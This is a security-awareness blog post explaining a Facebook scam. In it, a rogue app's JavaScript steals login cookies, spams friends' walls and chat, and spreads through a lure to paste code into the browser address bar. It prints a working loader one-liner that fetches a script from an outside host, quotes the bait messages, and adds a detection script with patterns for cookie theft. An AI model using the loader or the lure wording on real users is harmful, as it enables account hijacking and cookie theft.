What I am going to share today concerns the security of your Facebook account. As we all know, the Facebook family is growing day by day, so hackers mainly target Facebook accounts. If you are not aware of the many things that can happen to you on the internet, you can be fooled quickly by just a few social engineering tricks. A lack of awareness and knowledge can therefore lead to a bad outcome, “Your Facebook Gets Hacked”, which in turn can lead to misuse of your Facebook ID and many other problems. So today I’ll talk mainly about three things:-
- Facebook Applications might fool you
- Your cookies can be stolen, leading to account hacking
- Many other such things can be done by just social engineering
Besides these, I’ll also provide, as an example, an exploit that a hacker can use to accomplish all such tasks. Over time I have already posted updates about many scams on Facebook that may fool you.

On Facebook, security depends on you alone. Anyone in this world can make a Facebook account and get into the developers section in order to make an application. This world is made up of good as well as bad people, so there are still many security holes on Facebook: when an application is made by a black hat, he won’t keep people's safety in mind. He’ll make the application purely for destructive purposes, and with just a small piece of JavaScript he can get into the accounts of the many people who use the application and follow its guide.

How can he get in? Whenever we use that application and execute its JavaScript in our browser, our Facebook login cookies are stolen and sent to the hacker. As a result he is able to log in to your account and do what he wants, such as posting on your friends’ walls without your consent or harassing other users with your ID, leading to complete misuse of your identity and creating problems for you.

The script can be found here. The part that grabs your cookie is relatively simple: lines 10-21. Once the hacker has your cookie, he can do anything he wants with it. Now, what this script can do:-
- It can spam your friends’ walls with the text given in the script.
- It can get the list of online friends and send them the chat message given in the JavaScript
- It will send the victim's cookies to the hacker
- Sends the proper header information along with the request
All of this is done under the social engineering cover of the following alert statement, as you can see in the code of the JavaScript:-
“Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!'); // Stay here a little longer... please”
How is the scam going to spread by social engineering?
As you can guess, this is how a hacker will play social engineering on you in such a case: he will make an application or a website on which he tells you to paste a short JavaScript of the following type {javascript:(a=(b=document).createElement('script')).src='//hackersthirst.info/com/js.js?'+Math.random(),b.body.appendChild(a);void(0)} into your browser address bar, to find out whether your uploaded photo is more popular or most popular among your friends. There can be many other scams much like this one. Here hackersthirst.info/com/js.js is the path of the real, long JavaScript. He can also change the alert statement to whatever he wants, and similarly, in the part of the script that floods the friends’ walls, he will put the link of the application or website hosting the same JavaScript, like this:-
“Wow! Look at this i have found how much popular is my picture www.picchecket.tk”
How to: Remain safe from such attacks:-
So you can see how this is going to spread. Never put JavaScript in the browser address bar while using Facebook, no matter how much a hacker, an application or a fake website entices you to do so. Your common sense will always keep you safe from such attacks.
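The same rule can be checked automatically. The following is an added example, not part of the original post or of the emailed script: a small JavaScript heuristic that a moderator or message filter could run over wall posts to flag "paste this in your address bar" lures of the kind shown above. The names `analyzeLure` and `INDICATORS` are hypothetical, and the sample strings are constructed, with `loader.example.invalid` as a placeholder host.

```javascript
// Added example. Sample strings are constructed; loader.example.invalid is a
// placeholder host, and analyzeLure/INDICATORS are hypothetical names.
const INDICATORS = [
  // (?=\S) skips prose such as "JavaScript: tips"; a lure padded with a
  // space after the colon is missed, so this is a heuristic, not a parser.
  { id: 'javascript-scheme', re: /\bjavascript:(?=\S)/i },
  // Builds a <script> element at run time.
  { id: 'script-injection', re: /createElement\s*\(\s*['"]script['"]\s*\)/i },
  // Attaches the new element so the browser fetches and runs it.
  { id: 'dom-append', re: /\.(appendChild|append|insertBefore)\s*\(/i },
  // Reads any cookie that is not flagged HttpOnly.
  { id: 'cookie-read', re: /document\s*\.\s*cookie/i },
];

// Hosts assigned to .src, including protocol-relative //host/path URLs.
function remoteScriptHosts(text) {
  const re = /\.src\s*=\s*['"](?:https?:)?\/\/([a-z0-9.-]+)/gi;
  return [...new Set([...text.matchAll(re)].map(m => m[1].toLowerCase()))];
}

function analyzeLure(text) {
  const hits = INDICATORS.filter(i => i.re.test(text)).map(i => i.id);
  const hosts = remoteScriptHosts(text);
  const scheme = hits.includes('javascript-scheme');
  const loadsRemote = hits.includes('script-injection') && hosts.length > 0;
  let verdict = 'clean';
  if (scheme) verdict = 'review';
  if (scheme && (loadsRemote || hits.includes('cookie-read'))) verdict = 'block';
  return { verdict, hits, hosts };
}

const SAMPLES = {
  lure: `See how popular your photo is! Paste this in the address bar: ` +
    `javascript:(a=(b=document).createElement('script')).src=` +
    `'//loader.example.invalid/js.js?'+Math.random(),b.body.appendChild(a);void(0)`,
  bookmarklet: `javascript:void(document.body.style.fontSize='120%')`,
  prose: `I am learning JavaScript: any tips for a beginner?`,
};

for (const [name, text] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(analyzeLure(text)));
}
```

A harmless bookmarklet only reaches "review"; the "block" verdict is reserved for text that both uses the `javascript:` scheme and pulls in a remote script or touches `document.cookie`.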
Who emailed us this exploit?
For my introduction: My name is Nate. I have worked with many development teams but have recently gone and worked by myself in developing exploits in computers, then teaching the public about them and how to avoid and stop them. I have emailed this exploit coding, as this website is trying to spread awareness among people too.
Would love to hear from you...